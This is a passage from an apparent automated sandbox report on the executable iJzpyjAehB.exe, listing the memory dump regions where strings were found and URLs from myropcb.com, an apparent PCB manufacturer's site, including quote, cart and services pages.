00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/o
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/r
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
